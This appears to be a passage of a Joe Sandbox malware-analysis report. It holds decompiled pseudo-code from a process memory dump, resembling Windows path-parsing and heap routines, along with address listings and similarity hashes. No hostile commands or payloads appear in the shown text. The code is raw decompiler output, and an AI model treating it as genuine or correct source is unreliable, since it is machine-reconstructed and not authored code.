													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E0380F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E0380F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E0380F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E0380FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E0380FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E0380F3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E0380F3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E03894CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E0381D130(_t427, _t494, _t511);
				}
			}

0x03895ba5
0x03895baa
0x03895baf
0x03895bb4
0x03895bb6
0x03895bbc
0x03895bbe
0x03895bc4
0x03895bcd
0x03895bd3
0x03895bd6
0x03895bdc
0x03895be0
0x03895be3
0x03895beb
0x03895bf2
0x03895bf8
0x03895bfe
0x03895c04
0x03895c0e
0x03895c18
0x03895c1f
0x03895c25
0x03895c2a
0x03895c2c
0x03895c32
0x03895c3a
0x03895c3f
0x03895c42
0x03895c48
0x03895c5b
0x03895c5b
0x03895c2c
0x03895cb7
0x03895cb9
0x03895cbf
0x03895cc2
0x03895cca
0x03895ccb
0x03895ccb
0x03895cd1
0x03895cd7
0x03895cda
0x03895ce1
0x03895ce4
0x03895ce7
0x03895ced
0x03895cf3
0x03895cf9
0x03895cff
0x03895d08
0x03895d0a
0x03895d0e
0x03895d10
0x00000000
0x00000000
0x03895d16
0x03895d1a
0x00000000
0x00000000
0x03895d20
0x03895d22
0x03895d25
0x03895d2f
0x03895d2f
0x03895d33
0x03895d3d
0x03895d49
0x03895d4b
0x00000000
0x00000000
0x03895d5a
0x03895d5d
0x03895d60
0x00000000
0x00000000
0x03895d66
0x03895d69
0x00000000
0x00000000
0x03895d6f
0x03895d6f
0x03895d73
0x03895d79
0x03895d7f
0x03895d86
0x03895d95
0x03895d98
0x03895dba
0x03895dcb
0x03895dce
0x03895dd3
0x03895dd6
0x03895dd8
0x03895de6
0x03895dec
0x03895dee
0x03895df1
0x03895df3
0x0389635a
0x0389635a
0x00000000
0x0389635a
0x03895dfe
0x03895e02
0x03895e05
0x03895e07
0x03895e10
0x03895e13
0x03895e1b
0x03895e1c
0x03895e21
0x03895e22
0x03895e23
0x03895e25
0x03895e2a
0x03895e2c
0x03895e2e
0x03895e36
0x03895e39
0x03895e42
0x03895e47
0x03895e4d
0x03895e54
0x03895e54
0x03895e54
0x03895e2e
0x03895e5c
0x03895e5f
0x03895e62
0x03895e64
0x03895e6b
0x03895e70
0x03895e7a
0x03895e7a
0x03895e7a
0x03895e6b
0x03895e7e
0x03895e7f
0x03895e7f
0x03895e81
0x03895e87
0x03895e8b
0x03895e8c
0x03895e8c
0x03895e8c
0x03895e9a
0x03895e9c
0x03895ea2
0x03895ea6
0x03895f50
0x03895f50
0x03895f57
0x03895f66
0x03895f66
0x03895f66
0x03895f68
0x03895f6a
0x038963d0
0x00000000
0x03895f70
0x03895f70
0x03895f91
0x03895f9c
0x03895f9e
0x03895fa4
0x03895fa6
0x0389638c
0x03896392
0x038963a1
0x038963a7
0x038963af
0x038963af
0x038963bd
0x038963d8
0x00000000
0x038963d8
0x03895fac
0x03895fb2
0x03895fb4
0x03895fbd
0x03895fc6
0x03895fce
0x03895fd4
0x03895fdc
0x03895fec
0x03895fed
0x03895fee
0x03895fef
0x03895ff9
0x03895ffa
0x03895ffb
0x03895ffc
0x03896000
0x03896004
0x03896012
0x03896012
0x03896018
0x03896019
0x0389601a
0x0389601b
0x0389601c
0x03896020
0x03896059
0x0389605c
0x03896061
0x03896061
0x03896022
0x03896022
0x03896022
0x03896025
0x0389602a
0x0389602b
0x03896031
0x03896037
0x03896038
0x0389603e
0x03896048
0x03896049
0x0389604a
0x0389604b
0x0389604c
0x0389604d
0x03896053
0x03896054
0x03896054
0x03896062
0x03896065
0x03896067
0x0389606a
0x03896070
0x03896075
0x03896076
0x03896081
0x03896087
0x03896095
0x03896099
0x0389609e
0x038960a4
0x038960ae
0x038960b0
0x038960b3
0x038960b6
0x038960b8
0x038960ba
0x038960ba
0x038960ba
0x038960ba
0x038960be
0x038960c0
0x038960c5
0x038960c5
0x038960c5
0x038960c6
0x038960cd
0x03896114
0x038960cf
0x038960cf
0x038960d4
0x038960d5
0x038960da
0x038960db
0x038960e1
0x038960e2
0x038960e8
0x038960f8
0x038960fd
0x038960fe
0x03896102
0x03896104
0x03896107
0x03896109
0x0389610b
0x0389610b
0x0389610b
0x0389610b
0x0389610f
0x0389610f
0x03896117
0x0389611a
0x0389611f
0x03896125
0x03896134
0x03896139
0x0389613f
0x03896146
0x03896148
0x0389614b
0x0389614d
0x0389614f
0x0389614f
0x0389614f
0x0389614f
0x03896153
0x03896159
0x03896159
0x0389615c
0x03896163
0x03896169
0x0389616c
0x03896172
0x03896181
0x03896186
0x03896187
0x0389618b
0x03896191
0x03896195
0x038961a3
0x038961bb
0x038961c0
0x038961c3
0x038961cc
0x038961d0
0x038961dc
0x038961de
0x038961e1
0x038961e4
0x038961e6
0x038961e8
0x038961e8
0x038961e8
0x038961e8
0x038961e6
0x038961ec
0x038961f3
0x03896203
0x03896209
0x0389620a
0x03896216
0x0389621d
0x03896227
0x03896241
0x03896246
0x0389624c
0x03896257
0x03896259
0x0389625c
0x0389625e
0x03896260
0x03896260
0x03896260
0x03896260
0x0389625e
0x03896264
0x03896267
0x03896269
0x03896315
0x03896315
0x0389631b
0x0389631e
0x03896324
0x03896327
0x0389632f
0x03896330
0x03896333
0x0389633a
0x0389633c
0x03896335
0x03896335
0x03896335
0x0389633f
0x03896342
0x0389634c
0x03896352
0x03896355
0x03896355
0x03896359
0x00000000
0x0389626f
0x03896275
0x03896275
0x03896278
0x0389627e
0x0389627e
0x03896281
0x03896287
0x0389628d
0x03896298
0x0389629c
0x038962a2
0x0389629e
0x0389629e
0x0389629e
0x038962a7
0x038962a7
0x038962aa
0x038962b0
0x038962f0
0x038962f0
0x038962f2
0x038962f8
0x038962fd
0x038962b2
0x038962b2
0x038962b2
0x038962b5
0x038962dd
0x038962e2
0x038962e5
0x038962b7
0x038962b8
0x038962bb
0x038962bd
0x038962c0
0x038962c4
0x038962cd
0x038962cd
0x038962c0
0x038962bb
0x038962b5
0x03896302
0x03896303
0x03896305
0x03896305
0x03896305
0x0389630c
0x0389630c
0x00000000
0x0389627e
0x03896269
0x03895eac
0x03895ebb
0x03895ebe
0x03895ecb
0x03895ecb
0x03895ece
0x03895ece
0x03895ed4
0x03895ed7
0x03895ed9
0x03895edb
0x03895edb
0x03895ee1
0x03895ee1
0x03895ee3
0x03895f20
0x03895f20
0x03895ee5
0x03895ee5
0x03895ee5
0x03895ee8
0x03895f11
0x03895f18
0x03895eea
0x03895eea
0x03895eed
0x03895ef2
0x03895ef8
0x03895efb
0x03895f0a
0x03895f0a
0x03895eed
0x03895ee8
0x03895f22
0x03895f28
0x00000000
0x00000000
0x03895f30
0x03895f31
0x03895f37
0x03895f3a
0x03895f3d
0x03895f44
0x00000000
0x00000000
0x00000000
0x03895f46
0x03895f48
0x03895f4d
0x00000000
0x03895f4d
0x03895dda
0x03895ddf
0x00000000
0x03895ddf
0x03895dd8
0x03895da7
0x03895da9
0x03895dac
0x03895dae
0x00000000
0x03895db4
0x03895db4
0x00000000
0x03895db4
0x03895dae
0x03895d88
0x03895d8d
0x03896363
0x03896369
0x0389636a
0x03896370
0x03896372
0x0389637a
0x0389637b
0x0389637d
0x00000000
0x00000000
0x0389637f
0x03896385
0x00000000
0x03896385
0x03895d38
0x03895d3b
0x00000000
0x00000000
0x00000000
0x03895d3b
0x03895d27
0x03895d29
0x00000000
0x00000000
0x00000000
0x03896360
0x00000000
0x03896360
0x03895c10
0x03895c10
0x038963da
0x038963e5
0x038963e5

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea249a93706d84412fd16badf39aa2e1f69bc515e0d4d84e7b67f2f5bb73f2b1
Instruction ID: 3fd9636f37956b92fb7607ad1d7f12629c98e7a408843e2bde3a1b8b3aefa9a7
Opcode Fuzzy Hash: ea249a93706d84412fd16badf39aa2e1f69bc515e0d4d84e7b67f2f5bb73f2b1
Instruction Fuzzy Hash: 82424A759002298FEB24CFA8C880BA9F7B1FF49314F1981EAD94DEB241E7749985CF50

Uniqueness

Uniqueness Score: -1.00%

Function 037E4120 Relevance: .4, Instructions: 444
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E037E4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x38bd360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E037FF232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E037E6E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L037E4620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E037E6E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M037E45F8))) {
												case 0:
													_v568 = 0x37a1078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x37a11c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L037E4620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E0380F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E0380F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E037C52A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E037DEB70(1, 0x38b79a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E037DAA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E038095D0();
																			L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E0380B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E03803D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
